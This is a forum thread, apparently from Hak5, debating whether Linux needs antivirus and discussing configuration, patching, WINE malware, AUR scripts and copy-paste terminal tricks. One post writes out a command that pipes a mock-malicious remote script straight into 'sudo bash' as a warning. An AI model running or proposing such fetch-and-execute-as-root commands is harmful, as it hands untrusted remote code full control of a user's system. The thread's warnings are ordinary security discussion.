Is linux that secure?

How secure is Linux?

Some of the hosts at The Hak5 don’t really have anti-virus software since they believe that Linux isn’t very common with viruses so there is no need to have anti-virus software.
Is linux really that secure?

as a pentester in training, it comes down to
1.) how was it configured
2.) what software/services were installed
3.) are all packages up to date.

there are always new exploits coming out which seem to get patched pretty quick. That being said, in a malware standpoint, most of what you’d come across on the internet isnt linux based.

Also, java is cross platform so you do have to worry about those attack surfaces. Do your due diligence and install good addons in your browser like no-script, ghostery, self destructing cookies, etc.

Mcaffee supports linux. But it’s the enterprise product.

Most of the protection can come from firewalls and UTM’s

Theres like 2 or 3 malware that never went anywhere. Supposedly theres a ransomware but no one has proof it exists. Pretty much the most of a virus you can get is infecting a wine prefix.

Well Quebes OS is

It depends.

The question to ask is secure from what? Or maybe more accurately, what do you need to secure your OS from?

When it comes to standard malware, etc. Linux is fairly secure from it, but that doesnt mean you should just blindly download anything.

Linux, the open source community and software developers in general are (in my opinion) a disaster waiting to happen. There’s so many projects, OS’, and “guides” out there that have no consideration for security there going to end up infecting large numbers of machines.

The shell script run commands you see for installing software that some sites have that tell you to just blindly run this as root. Or distros that don’t have much validation of packages or good security infrastructure on there infrastructure leading to things like the mint incident(s).

There’s plenty of things to go wrong.

On the other hand, many things are made with security in mind, and Linux can be as secure as you want it to be, and usually its fairly secure out the box (distro depending).

Good example here (with demo)

https://thejh.net/misc/website-terminal-copy-paste

It shows that it is possible to have a user copy some harmless text from a website or “tutorial”, and when pasted into anywhere else like a terminal, it is completely different from what you think you copied.

And the return character can be placed at the end so it runs immediately when pasted.

I don’t run AV on Linux. I’ve never had a problem in my time on Linux (2004ish)

http://iase.disa.mil/stigs/os/unix-linux/Pages/index.aspx

If you’re concerned with Linux security, a good place to start is with STIGs.

You also want to make sure you’ve got browser protection (noscript, ghostery, adblock, etc)

From there, just knowing what’s running on your system is your best defense against system compromise.

Yep, there’s also the curl https://sillysite.io/totally-not-malware.sh | sudo bash exploit where when you curl it to a file to read, it looks fine, but when the webserver detects being piped straight to bash, it sends something completely different.

well yeah, you’re downloading a sh script. not really an exploit, (if you consider social engineering) because anyone who knows linux, would be smart enough to look at it first before downloading it and piping it to the interpreter.

Don’t overestimate people. I could find a 100 Arch users who blindly run AUR scripts without a second thought. Just because someone is using Linux doesnt mean they know what they are doing when it comes to security. The opposite in fact in most cases.

I guess you’ve got a point there. I started in security before I went to linux, so I might be biased.

You are Always remember the layer 8 issue, a few years now has pretty much confirmed to me its almost always a end user problem (directly or indirectly).

We need good defaults and good education, and then we need good detection and prevention tools installed and on by default.

edit: and for linux / open source its self we need to security from the projects, itll go wrong there first.

Don’t get me started on that. The AUR is nice, but you need to wget your pkgbuild, read through it to make sure you’re not about to install malware.so and only then can you use makepkg

Computers are perfect, users are far from.

The problem is the balance between secure defaults and “just works.” Sometimes these two are mutually exclusive and that’s where the problems reside.

WINE provides compatibility with windows programs… and its viruses.

Apparently the WannaCry malware has infected a few linux machines in this manner. To be fair, you’d have to pretty much use windows based web browsers and e-mail clients to get infected in this way, even worse if you run WINE as root, but I’ve heard it’s happened.

there is no such thing as a “secure” computer. someone with physical access to it and a beef with you will compromise said computer regardless of its os. yes even openbsd.

they will either:

1. crack any encryption, passwords, and any bio unlock you might have going
2. threaten you in such a way that you will unlock it for them (ie jail time or worse)

$5 hammer anyone?

$5 craigslist microwave ?

The best way to make sure no one can get into your ram.

Please don’t use Ghostery. Use Disconnect and uBlock Origin.

That’s fun.

I don’t really see a problem with opt-in sending data on shit ads. Honestly, I don’t mind ads as long as they don’t use an entire CPU core, they don’t install malware and they don’t track me.